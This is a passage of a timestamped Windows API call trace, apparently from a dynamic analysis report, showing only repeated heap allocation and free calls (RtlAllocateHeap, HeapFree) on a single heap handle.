hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0187.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0187.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.453] HeapFree (in: hHeap=0x2c0000, 